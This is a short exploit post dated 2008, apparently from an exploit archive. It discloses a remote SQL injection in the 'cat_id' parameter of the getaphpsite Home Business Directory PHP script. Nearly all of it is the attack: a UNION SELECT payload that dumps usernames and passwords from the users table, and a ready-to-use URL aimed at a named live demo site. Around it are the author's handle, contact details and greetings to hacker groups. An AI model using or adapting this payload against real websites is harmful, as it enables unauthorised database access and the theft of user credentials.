[~] getaphpsite Home Business Directory (cat_id) Remote Sql inj [~] [~] script: http://www.getaphpsite.com/17.html [~] [~]---------------------------------------------------------- [~] Discovered By: ZoRLu msn: trt-turk@hotmail.com [~] [~] Date: 31.12.2008 [~] [~] Home: www.z0rlu.blogspot.com / www.experl.com [~] [~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( [~] ----------------------------------------------------------- Exploit: http://z0rlu.blogspot.com/script/directory.php?ax=list&sub=ZoRLu&cat_id=[SQL] [SQL]= 0x3a+union+select+1,2,concat(username,0x3a,password),4+from+users for demo: http://www.getaphpsite.com/demos/homebiz/directory.php?ax=list&sub=ZoRLu&cat_id=0x3a+union+select+1,2,concat(username,0x3a,password),4+from+users [~]---------------------------------------------------------------------- [~] Greetz tO: yildirimordulari.org & experl.com [~] [~]----------------------------------------------------------------------